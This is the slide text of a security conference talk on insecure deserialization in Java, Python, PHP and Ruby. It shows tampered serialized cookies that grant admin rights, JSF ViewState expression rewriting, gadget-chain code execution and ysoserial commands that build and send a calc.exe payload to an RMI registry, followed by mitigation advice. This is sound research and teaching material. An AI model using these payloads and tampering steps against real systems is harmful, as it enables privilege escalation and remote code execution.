SlideShare a Scribd company logo
1 of 84
Marshalling Pickles
how deserializing objects can ruin your
day
Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff)
2
Survey of object serialization vulnerabilities
Example exploitation
− Sample Apps
− Novel Vectors
− New Tools
Mitigation techniques
Talk Goals
*Did our best to find previous research and give credit/references. Please let us know if we missed any.
3
snapshots one or more “live”, in-memory objects into a flat, serial stream of data
that can be stored or transmitted for reconstitution and use by a different process
or the same process at some point
Formats
− Binary: Java Serialization, Ruby Marshal, Protobuf, Thrift, Avro, MS-NRBF, Android
Binder/Parcel, IIOP
− Hybrid/Other: PHP Serialization, Python pickle, Binary XML/JSON
− Readable: XML, JSON, YAML
Platform/Formats may have multiple implementations and/or sub-formats
Serializing Objects
a.k.a. “marshaling”, “pickling”, “freezing”, ”flattening”
4
Remote/Interprocess Communication (RPC/IPC)
− Communicating data to different system/process
− Wire protocols, web services, message brokers
Caching/Persistence
− Communicating data to process’ future self
− Databases, cache servers, file systems
Tokens
− Communicating data to different system/process and back
− HTTP cookies, HTML form parameters, API auth tokens
Purposes and Mediums
Why and where
5
Developers trust it too much and make assumptions
− Assume storage/transmission mediums are protected
− Assume binary formats are opaque
− Assume token authentication can’t be defeated
− Assume serialization is “safe“
We abuse trust and defy assumptions for a living
But why do we care?
6
“Any big binary blob needs to
be investigated as potential
object serialization”
7
Demos
8
THESE DEMOS ARE
FICTIONAL DRAMATIZATIONS
BASED ON TRUE STORIES
AND REAL EVENTS. ALL
NAMES HAVE BEEN
CHANGED TO PROTECT THE
GUILTY. *
* We have actually seen this stuff in assessments
9
Application State
Manipulation
10
What’s that?
Base64 encoded serialized Java object as a cookie value
11
0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual
0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec
0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User...........
0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL.
0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la
0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t..
0000060: 6761 6265 gabe
Serialized Java Object
12
0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual
0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec
0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User...........
0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL.
0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la
0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t..
0000060: 6761 6265 gabe
Class Description
13
0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual
0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec
0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User...........
0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL.
0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la
0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t..
0000060: 6761 6265 gabe
Data in object
14
0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual
0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec
0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User...........
0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL.
0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la
0000050: 6e67 2f53 7472 696e 673b 7870 0174 0005 ng/String;xp.t..
0000060: 6368 7269 73 chris
Data in object (Manipulated)
15
Screen Shots – Normal Login
https://bitbucket.org/gebl/appseccali-cookie
16
Screen Shots – Manipulated to be Admin and Chris
https://bitbucket.org/gebl/appseccali-cookie
17
By default, pickle data format uses an ASCII representation
− Protocol version 0: ASCII protocol
− Protocol version 1: Old binary format
− Protocol version 2: New binary format
Good write up on the formats:
− http://spootnik.org/entries/2014/04/05_diving-into-the-python-pickle-format.html
Python Pickle in Cookie
18
What’s that?
Base64 encoded pickled Python object
19
0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2
0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3
0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s.
Pickled Python Object
20
0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2
0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3
0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s.
Admin Property
21
0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2
0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3
0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s.
User Property
22
0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2
0000010: 0a49 3031 0a73 5327 7573 6572 270a 7033 .I01.sS'user'.p3
0000020: 0a56 6368 7269 730a 7034 0a73 2e .Vchris.p4.s.
Properties (Manipulated)
23
Screen Shots – Normal Login
https://bitbucket.org/gebl/appseccali-inapickle
24
Screen Shots – Manipulated to be Admin and Chris
https://bitbucket.org/gebl/appseccali-inapickle
25
Application Logic
Manipulation
26
PHP Serialization Format
Basic types:
− <type specifier>:<data>;
Arrays:
− a:<count>:{<key>:<value>,…}
Two ways for Objects:
− “O” just like array
− Custom defined by developer
http://www.phpinternalsbook.com/classes_objects/serialization.html
27
0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s:
0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0;
0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19:
0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan
0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern
0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe";
0000060: 7d0a }.
PHP Serialized Object
28
0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s:
0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0;
0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19:
0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan
0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern
0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe";
0000060: 7d0a }.
Class Name
29
0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s:
0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0;
0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19:
0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan
0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern
0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe";
0000060: 7d0a }.
IsAdmin Property
30
0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s:
0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0;
0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19:
0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan
0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern
0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe";
0000060: 7d0a }.
Plan Property (Filename)
31
0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s:
0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0;
0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19:
0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan
0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern
0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe";
0000060: 7d0a }.
Username Property
32
Screen Shot - Normal
https://bitbucket.org/gebl/appseccali-php
33
Enumerating Services
Oh, look… memcache!
34
Memcache Tamper Script
https://bitbucket.org/gebl/appseccali-php
35
Executing Script
https://bitbucket.org/gebl/appseccali-php
36
Screen Shot – Memcache changed
https://bitbucket.org/gebl/appseccali-php
37
Expression Language (EL) allows the use of simple expressions to:
− Dynamically read application data
− Dynamically write application data
− Invoke arbitrary methods
Java Server Faces
http://www.developer.am/interesting/jsp-application-lifecycle/
38
<h:form>
<qcom:userheader dispname="#{loginBean.name}"></qcom:userheader>
<ui:fragment rendered="#{loginBean.isadmin}">
<p> you are an admin!</p>
</ui:fragment>
<h:panelGrid columns="2">
<h:outputText value="Update Login Name"></h:outputText>
<h:inputText value="#{loginBean.name}"></h:inputText>
</h:panelGrid>
<h:commandButton value="Update" action="update"></h:commandButton>
</h:form>
JSP Source
https://bitbucket.org/gebl/appseccali-jsf-el
39
New Tool:
View State
Messer!
https://bitbucket.org/gebl/viewstatemesser
40
java -jar ViewStateMesser.jar dump
Array Items:
Array Items:
org.apache.myfaces.application.TreeStructureManager$TreeStructComponent
1338668845
Fields:
_children:
Array Items:
org.apache.myfaces.application.TreeStructureManager$TreeStructComponent
159413332
Fields:
_children:
Array Items:
org.apache.myfaces.application.TreeStructureManager$TreeStructComponent
1028214719
Fields:
_children:
com.qualcomm.isrm.jsf.NullReference@1ddc4ec2
_componentClass:
javax.faces.component.html.HtmlOutputLabel
_componentId:
Dump of ViewState
https://bitbucket.org/gebl/appseccali-jsf-el &
https://bitbucket.org/gebl/viewstatemesser
41
org.apache.myfaces.view.facelets.el.ContextAwareTagValueExpressionUEL
935044096
Fields:
Custom:
org.apache.el.ValueExpressionImpl
396180261
Fields:
Custom:
00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d
00 11 23 7b 6c 6f 67 69 6e 42 65 61 6e 2e 6e 61 6d 65 7d 00 10 6a 61 76 61 2e 6c 61 6e 67
_ _ # { l o g i n B e a n . n a m e } _ _ j a v a . l a n g
2e 4f 62 6a 65 63 74
. O b j e c t
NULL
NULL
Dump of ViewState
https://bitbucket.org/gebl/appseccali-jsf-el &
https://bitbucket.org/gebl/viewstatemesser
42
Usage:
− java -jar ViewStateMesser.jar "#{loginBean.isadmin}“
Finds all org.apache.el.ValueExpressionImpl and replaces the EL with the
supplied argument.
Similar to Synacktiv InYourFace tool
Changing the ViewState EL
https://bitbucket.org/gebl/appseccali-jsf-el &
https://bitbucket.org/gebl/viewstatemesser
43
44
Arbitrary Code
Execution
45
Code reuse attack (a la ROP)
Uses “gadget” classes already in scope of application
Create chain of instances and method invocations
− Start with “kick-off” gadget that executes during or after deserialization
− End in “sink” gadget that executes arbitrary code/commands
− Use other gadgets to chain start gadget execution to end gadget
Serialize chain and send to vulnerable deserialization in application
Chain executed in application during/after deserialization
Profit
Property-Oriented Programming / Object Injection
Earliest POP research we
found was by Stefan Esser
(@i0n1c), “Utilizing Code
Reuse/ROP in PHP
Application Exploits"
46
Rube-Goldberg-esque
Gadget chains are generally carrier-medium, application, and OS/platform
agnostic
− Relies only on code available to application
− Not necessarily code used by application
Gadget Classes
− Target common libraries/frameworks. Library sprawl FTW.
− “Proxy” gadgets versatile
− Deserialization hook methods for self-execution
Gadget hunting and chain construction is an art
− Can be frustrating and tedious
− Rich IDEs help, but custom tools are better
− https://github.com/frohoff/inspector-gadget (out of scope for talk)
Property-Oriented Programming / Object Injection
47
Target Ruby’s ERB templating system
Use Rails utility classes in chain
Chain from Rails YAML exploit
− YAML version required addition gadgets
Executed by Rails by accessing session object after deserialization
A Ruby + Rails Gadget Chain
Chain discovered by
Charlie Somerville
(@charliesome) as part of a
Rails YAML exploit
48
Code Execution
via Ruby Marshal
Exposed redis listener
https://github.com/frohoff/appseccali-rails-redis
https://github.com/frohoff/rails_exploits
49
50
A Simple Java Gadget Chain
ObjectInputStream.readObject()
“calc.exe”
51
Time-Lapse of Deserialization
ObjectInputStream.readObject() called
ObjectInputStream
readObject()
defaultReadObject()
52
Time-Lapse of Deserialization
CacheManager instance allocated
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
53
Time-Lapse of Deserialization
CacheManager.readObject() called
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
54
Time-Lapse of Deserialization
ObjectInputStream.defaultReadObject() called
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
55
Time-Lapse of Deserialization
CommandTask instance allocated and referenced by CacheManager.initHook field
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
CommandTask
run()
56
Time-Lapse of Deserialization
CommandTask.run() called
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
CommandTask
run()
57
Time-Lapse of Deserialization
Runtime.exec() called
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
CommandTask
run()
Runtime
exec()
“calc.exe”
58
Time-Lapse of Deserialization
Target program run
CacheManager
ObjectInputStream
readObject()
readObject()
defaultReadObject()
CommandTask
run()
Runtime
exec()
“calc.exe”
59
A Java +
Commons-
Collections Gadget
Chain
60
Target java.lang.Runtime.exec(String cmd)
Uses gadgets in JDK and Apache Commons-Collections library
Self-executing during deserialization
− Executes before object returned to caller
A Java + Commons-Collections Gadget Chain
Similar POP techniques previously applied to
Java Serialization by Wouter Coekaerts
(@WouterCoekaerts) and implemented by
Alvaro Muñoz (@pwntester)
61
Call Chain
62
Gadget Chain Construction Code and Call Tree
63
New Tool:
ysoserial
https://github.com/frohoff/ysoserial
64
Tool and utilities for generating Java deserialization exploit payloads
Contains multiple gadget chain payloads
− CommonsCollections1 (commons-collections)
− CommonsCollections2 (commons-collections4)
− Spring1 (spring-core, spring-beans)
− Groovy1 (groovy)
Create payload to execute calc.exe using CommonsCollections1 chain:
$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd | head -3
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe > payload.bin
Send exploit payload to RMI Registry listener:
$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
ysoserial: Usage info
65
Code Execution
via Java
Serializable
JSF ViewState form parameters deserialized without
authentication
66
Code Execution via Java Serializable
JSF (MyFaces) ViewState form parameters deserialized
67
68
Code Execution
via Java
Serializable
RMI Regisitry deserializing untrusted data from
remoting protocol stream
69
RMIRegistry
https://github.com/frohoff/appseccali-java
70
71
General
− Can only use classes available to application
Java Serialization
− ClassLoader of vulnerable code vs gadgets
− Gadget classes must implement Serializable/Externalizable
− Library/class version differences
− Static type constraints
Web frameworks
− Many (but not all) now have sane defaults
− Sign (and sometimes encrypt) client tokens: session cookies, viewstate, etc.
Property Oriented Programming: Limitations & Caveats
72
Mitigation
73
Avoid open-ended (de)serialization when possible
− If the serialization includes a class name, it’s probably bad
Simple format and/or data types
− Strings, Numbers, Arrays, Maps, etc.
Manually serialize complex objects
Keep session state on the server when possible
− Beware of lateral attacks! (memcached, redis, database, etc.)
Abstenence
Avoid magic
74
Whitelist/Blacklist classes
Constrain to expected type
Statically typed object structure
Schema-enforced formats
Difficult without library support
Restrict Deserialization
Code defensively
75
Java
− Default ObjectInputStream will deserialize any Serializable class
− Class Blacklisting/Whitelisting
− Subclass ObjectInputStream
− override resolveClass() to allow/disallow classes
− A bit of a hack
− http://www.ibm.com/developerworks/library/se-lookahead/
Ruby
− Default Marshal behavior deserializes any class
− No obvious clean way to change
− Maybe monkey patch Marshal hook methods on Object class (untested)
PHP
− 
Restrict Deserialization
76
Python
− Default unpickler will import any class
− Pickle
− Subclass Unpickler, override load_global
− Load_global push safe classes onto pickler’s stack or raise an error
− HACK according to the docs!
− Cpickle
− Set find_global to a function
− Function takes module and class
− Create on object or raise an error
− https://docs.python.org/2/library/pickle.html
− Section 11.1.6
Restrict Deserialization
77
Encryption != Authentication
Authenticate channels
− TLS Client Certs, SASL, DB/Cache/Broker credentials
Authenticate content
− HMAC or Authenticated Encryption with secret key
Must be verified pre-deserialization!
Pro-tip: Don’t leak crypto keys!
Authenticate
Trust Verify
78
Strict firewall rules for deserializing listeners
Sandboxing/Hardening
− Java SecurityManager
− RestrictedPython
− php.ini security settings
− AppArmor
− SELinux
Security-in-depth
Assume breach of defenses
79
Vulnerability is in doing unsafe deserialization, not in having gadgets
available
More will be always found
Transitive dependencies cause library sprawl
Cross-library gadget chains
Auto-detection difficult
Gadget Whack-a-Mole
Don’t rely on this!
80
Find more unsafe deserialization
Find more gadgets/chains
Gadget finding tool improvements
Explore mediums, platforms, formats, implementations
Future Work (including for you)
Go forth and pwn all the things
81
Stefan Esser, 2009/11/1, Shocking News in PHP Exploitation
− https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_fu_esser_php_exploits1.pdf
David Byrne, Rohini Sulatycki, 2010/6/21, Beware of Serialized GUI Objects Bearing Data
− https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf
Stefan Esser, 2010/7/29, Utilizing Code Reuse/ROP in PHP Application Exploits
− https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf
Wouter Coekaerts, 2011/9/9, Spring Vulnerabilities
− http://wouter.coekaerts.be/2011/spring-vulnerabilities
Charlie Sommerville, 2013/1/10, Rails 3.2.10 Remote Code Execution
− https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md
Arseniy Reutov, 2013/5/28, PHP Object Injection Revisited
− https://prezi.com/5hif_vurb56p/php-object-injection-revisited/
Stephen Coty, 2013/6/14, Writing Exploits for Exotic Bug Classes: unserialize()
− https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes/
Ben Murphy, 2013/6/23, Property Oriented Programming Applied to Ruby
− http://slides.com/benmurphy/property-oriented-programming#/
Robert Heaton, 2013/7/22, How to hack a Rails app using its secret_token
− http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/
Dinis Cruz, 2013/8/6, Using XMLDecoder to execute server-side Java Code on an Restlet application
− http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
Past Work / References
82
Abraham Kang, Dinis Cruz, Alvaro Munoz, 2013/8/6, RESTing on your laurels will get you pwned
− http://www.slideshare.net/DinisCruz/res-ting-on-your-laurels-will-get-you-powned4-3
Tom Van Goethem, 2013/9/11, WordPress < 3.6.1 PHP Object Injection
− https://vagosec.org/2013/09/wordpress-php-object-injection/
David Jorm, 2013/11/20, Java Deserialization Flaws: Part 1, Binary Deserialization
− https://securityblog.redhat.com/2013/11/20/java-deserialization-flaws-part-1-binary-deserialization/
Alvaro Munoz, 2013/12/16, CVE-2011-2894: Deserialization Spring RCE
− http://pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/
Dinis Cruz, 2013/12/22, XStream "Remote Code Execution" exploit on code from "Standard way to serialize and
deserialize Objects with XStream" article,
− http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
David Jorm, 2014/1/23, Java deserialization flaws: Part 2, XML deserialization
− https://securityblog.redhat.com/2014/01/23/java-deserialization-flaws-part-2-xml-deserialization/
Johannes Dahse, Nikolai Krein, Thorsten Holz, 2014/11/3, Code Reuse Attacks in PHP: Automated POP Chain
Generation
− https://websec.files.wordpress.com/2010/11/rips_ccs.pdf
− http://syssec.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf
Renaud Dubourguais, Nicolas Collignon, JSF ViewState upside-down
− http://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf
Past Work / References
83
Sample Apps
− https://bitbucket.org/gebl/appseccali-cookie
− https://bitbucket.org/gebl/appseccali-inapickle
− https://bitbucket.org/gebl/appseccali-php
− https://bitbucket.org/gebl/appseccali-jsf-el
− https://github.com/frohoff/appseccali-rails-redis
− https://github.com/frohoff/appseccali-java
Tools
− https://bitbucket.org/gebl/viewstatemesser
− https://github.com/frohoff/rails_exploits
− https://github.com/frohoff/ysoserial
− https://github.com/frohoff/inspector-gadget
Sample Apps and Tools
84
For more information on Qualcomm, visit us at:
www.qualcomm.com & www.qualcomm.com/blog
Qualcomm is a trademark of Qualcomm Incorporated, registered in the United States and other
countries.
Other products and brand names may be trademarks or registered trademarks of their respective
owners
Thank you
Follow us on:
Gabe Lawrence
gabe@qualcomm.com
@gebl
Chris Frohoff
cfrohoff@qualcomm.com
@frohoff

More Related Content

What's hot

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communicationmsaindane
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationSukhpreet Singh
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Windows kernel basic exploit
Windows kernel basic exploitWindows kernel basic exploit
Windows kernel basic exploitKyoungseok Yang
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 

What's hot (20)

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communication
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure Deserialization
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Windows kernel basic exploit
Windows kernel basic exploitWindows kernel basic exploit
Windows kernel basic exploit
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 

Similar to Marshalling Pickles: how deserializing objects can ruin your day

Model driven telemetry
Model driven telemetryModel driven telemetry
Model driven telemetryCisco Canada
 
Killing Passwords with JavaScript
Killing Passwords with JavaScriptKilling Passwords with JavaScript
Killing Passwords with JavaScriptFrancois Marier
 
e10sとアプリ間通信
e10sとアプリ間通信e10sとアプリ間通信
e10sとアプリ間通信Makoto Kato
 
Webinar–Mobile Application Hardening Protecting Business Critical Apps
